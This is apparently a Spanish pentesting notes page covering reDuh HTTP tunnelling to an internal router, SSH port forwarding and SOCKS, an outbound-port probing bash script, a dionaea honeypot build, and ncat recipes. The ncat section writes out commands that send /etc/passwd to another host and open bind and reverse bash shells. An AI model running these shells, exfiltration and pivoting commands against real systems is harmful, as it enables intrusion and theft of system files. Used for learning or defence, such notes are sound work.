# Reduh

Introducción

Utilizamos telnet para conectarnos a un router interno y pivotamos en un servidor web.
El tráfico telnet está encapsulado por un túnel HTTP entre local y servidor.
El router recibe la conexión telnet desde la IP del servidor.

Reduh

Ejecución
local# java -jar reDuhClient.jar http://servidor/reDuh.php
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from servidor:80/reDuh.php.  Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
local# ncat local 1010
Welcome to the reDuh command line
>>[createTunnel]1234:router:23
 Successfully bound locally to port 1234. Awaiting connections.

>>
local# telnet local 1234

# Túneles sobre SSH

Introducción

Utilizamos telnet para conectarnos a un router interno pero antes pivotamos en un servidor SSH.
El tráfico telnet está cifrado por un túnel SSH entre local y servidor.
El router recibe la conexión telnet desde la IP del servidor.

Ejecución estática
local# ssh -L 1234:router:23 -f -N usuario@servidor
local# telnet local 1234
Ejecución dinámica (SOCKS)
local# ssh -D 1080 -f -N usuario@servidor
local# cat /etc/tsocks.conf | grep -v -e ^# -e ^$
server = 127.0.0.1
server_type = 5
server_port = 1080
local# tsocks telnet router 23

# Opa

Introducción

Para conocer los puertos abiertos de salida a Internet ejecutaremos el script opa en local y escucharemos con tcpdump en la máquina remota.
remoto# stdbuf -o0 \
tcpdump -tni eth0 src net 82.81.233.0/24 2> /dev/null \
| awk -W interactive '{print $2,$3,$4}'
local# cat opa
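#!/bin/bash
#
# NAME
#       opa - Outbound Port Agent
#
# SYNOPSIS
#       ./opa remote_ip from_port to_port [udp_mode]
#
# EXAMPLE
#       ./opa 79.159.199.15 1 65535
#       ./opa 79.159.199.15 1 1024 -u
#
# DESCRIPTION
#       Launches one short-lived nc probe per port in [from_port, to_port],
#       in batches, so that a capture on the remote side shows which
#       outbound ports the local network lets through. The source port is
#       set equal to the destination port (nc -p). Only the probes started
#       by this script are reaped; other nc processes on the host are left
#       alone.

set -u

usage() {
  printf 'Usage: %s remote_ip from_port to_port [-u]\n' "${0##*/}" >&2
  exit 2
}

(( $# >= 3 )) || usage

ip=$1
from=$2
to=$3
udp=${4:-}

# Both bounds must be integers inside the TCP/UDP port range.
[[ "$from" =~ ^[0-9]+$ && "$to" =~ ^[0-9]+$ ]] || usage
(( from >= 1 && to <= 65535 && from <= to )) || usage

# Number of probes kept in flight before they are reaped.
readonly batch_size=9
pids=()

# Kill and wait for the probes this script started (never a global killall).
reap() {
  (( ${#pids[@]} )) || return 0
  kill "${pids[@]}" 2> /dev/null
  wait "${pids[@]}" 2> /dev/null
  pids=()
}
trap reap EXIT

# The original version skipped every tenth port (it spent one iteration on
# the kill instead of probing); here every port in the range is probed and
# the batch is reaped after the probe has been launched.
for (( port = from; port <= to; port++ )); do
  # shellcheck disable=SC2086 — $udp is either empty or the -u flag
  nc $udp -p "$port" "$ip" "$port" 2> /dev/null &
  pids+=("$!")
  if (( ${#pids[@]} >= batch_size )); then
    reap
  fi
done
reap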

local# ./opa 79.159.199.15 1 65535

# Instalar dionaea

Información

Dionaea

Instalación (las fuentes se obtienen por git:// y http:// sin verificar firma ni suma de comprobación; conviene contrastar los hashes con los publicados por cada proyecto antes de compilar)
# cat /etc/lsb-release | grep DESC
DISTRIB_DESCRIPTION="Ubuntu 10.10"
# cd
# ### Some packages
# apt-get install libudns-dev \
libglib2.0-dev \
libssl-dev \
libcurl4-openssl-dev \
libreadline-dev \
libsqlite3-dev \
python-dev \
libtool \
automake \
autoconf \
build-essential \
subversion \
git-core \
flex \
bison \
pkg-config
# mkdir /opt/dionaea
# mkdir dionaea
# cd dionaea
# ### liblcfg
# git clone git://git.carnivore.it/liblcfg.git liblcfg
# cd liblcfg/code
# autoreconf -vi
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# cd ..
# ### libemu
# git clone git://git.carnivore.it/libemu.git libemu
# cd libemu
# autoreconf -vi
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# ### libev
# wget http://dist.schmorp.de/libev/Attic/libev-3.9.tar.gz
# tar xfz libev-3.9.tar.gz
# cd libev-3.9
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# ### cython
# wget http://cython.org/release/Cython-0.12.1.tar.gz
# tar xfz Cython-0.12.1.tar.gz
# cd Cython-0.12.1       
# python setup.py build
# sudo python setup.py install
# cd ..
# ### sqlite3
# apt-get install sqlite3
# ### python3
# wget http://python.org/ftp/python/3.1.2/Python-3.1.2.tgz
# tar xfz Python-3.1.2.tgz
# cd Python-3.1.2
# ./configure --enable-shared \
--prefix=/opt/dionaea \
--with-computed-gotos \
--enable-ipv6 \
LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/"
# make
# make install
# cd ..
# ### libxml2
# apt-get install libxml2-dev
# ### libxslt
# apt-get install libxslt1-dev
# ### lxml
# wget http://codespeak.net/lxml/lxml-2.2.6.tgz
# tar xfz lxml-2.2.6.tgz
# cd lxml-2.2.6
# /opt/dionaea/bin/2to3 -w src/lxml/html/_diffcommand.py
# /opt/dionaea/bin/2to3 -w src/lxml/html/_html5builder.py
# /opt/dionaea/bin/python3 setup.py build
# /opt/dionaea/bin/python3 setup.py install
# cd ..
# ### c-ares
# wget http://c-ares.haxx.se/c-ares-1.7.3.tar.gz
# tar xfz c-ares-1.7.3.tar.gz
# cd c-ares-1.7.3
# ./configure --prefix=/opt/dionaea
# make
# make install
# cd ..
# ### curl
# wget http://curl.haxx.se/download/curl-7.20.0.tar.bz2
# tar xfj curl-7.20.0.tar.bz2
# cd curl-7.20.0
# ./configure --prefix=/opt/dionaea --enable-ares=/opt/dionaea
# make
# make install
# cd ..
# ### libpcap
# wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
# tar xfz libpcap-1.1.1.tar.gz
# cd libpcap-1.1.1
# ./configure --prefix=/opt/dionaea
# make
# make install
# cd ..
# ### p0f
# apt-get install p0f
# ### dionaea
# git clone git://git.carnivore.it/dionaea.git dionaea
# cd dionaea
# autoreconf -vi
# ./configure --with-lcfg-include=/opt/dionaea/include/ \
--with-lcfg-lib=/opt/dionaea/lib/ \
--with-python=/opt/dionaea/bin/python3.1 \
--with-cython-dir=/usr/local/bin \
--with-udns-include=/opt/dionaea/include/ \
--with-udns-lib=/opt/dionaea/lib/ \
--with-emu-include=/opt/dionaea/include/ \
--with-emu-lib=/opt/dionaea/lib/ \
--with-gc-include=/usr/include/gc \
--with-ev-include=/opt/dionaea/include \
--with-ev-lib=/opt/dionaea/lib \
--with-nl-include=/opt/dionaea/include \
--with-nl-lib=/opt/dionaea/lib/ \
--with-curl-config=/opt/dionaea/bin/ \
--with-pcap-include=/opt/dionaea/include \
--with-pcap-lib=/opt/dionaea/lib/ \
--with-glib=/opt/dionaea
# make
# make install
# cd ..
Configuración
# cd /opt/dionaea/etc/dionaea
# sed -i 's/^\/\/\t\t\t"p0f"/\t\t\t"p0f"/' dionaea.conf
Ejecución
# cd /opt/dionaea/bin/
# p0f -i any -u root -Q /tmp/p0f.sock -q -l -d -o /tmp/p0f.log
# ./dionaea -l all,-debug -L '*' -D
Visualización
# cd /opt/dionaea/var/dionaea
# sqlite3 logsql.sqlite
sqlite> select count(local_port), local_port
FROM connections
where connection_type='accept'
group by local_port;
9|135
4|445
2|1433
sqlite> .exit

# Ncat

Información

Ncat

Recibir un fichero de un equipo remoto
local# ncat -l 192.168.1.1 1234
remoto# ncat --send-only 192.168.1.1 1234 < /etc/passwd
Recibir un fichero de un equipo remoto (cifrando; sin --ssl-verify el cliente no autentica el certificado del servidor)
local# ncat --ssl -l 192.168.1.1 1234
remoto# ncat --ssl --send-only 192.168.1.1 1234 < /etc/passwd
Abrir una shell en un equipo remoto
remoto# ncat -l 192.168.1.2 1234 -c "bash -i 2>&1"
local# ncat 192.168.1.2 1234
Recibir una shell de un equipo remoto
local# ncat -l 192.168.1.1 1234
remoto# ncat 192.168.1.1 1234 -c "bash -i 2>&1"
Redirección de puertos con destino fijo
remoto# ncat -l 192.168.1.2 1234 -c "ncat 192.168.1.3 21"
local# ncat 192.168.1.2 1234
Redirección de puertos con destino variable (proxy; sin --allow ni --proxy-auth el listener acepta cualquier cliente)
remoto# ncat -l 192.168.1.2 1234 --proxy-type http
local# ncat --proxy 192.168.1.2:1234 192.168.1.3 21
Chat entre dos clientes con control de acceso
servidor# ncat -l 192.168.1.3 1234 --chat -m 2 --allow 192.168.1.0/24
remoto# ncat 192.168.1.3 1234
local# ncat 192.168.1.3 1234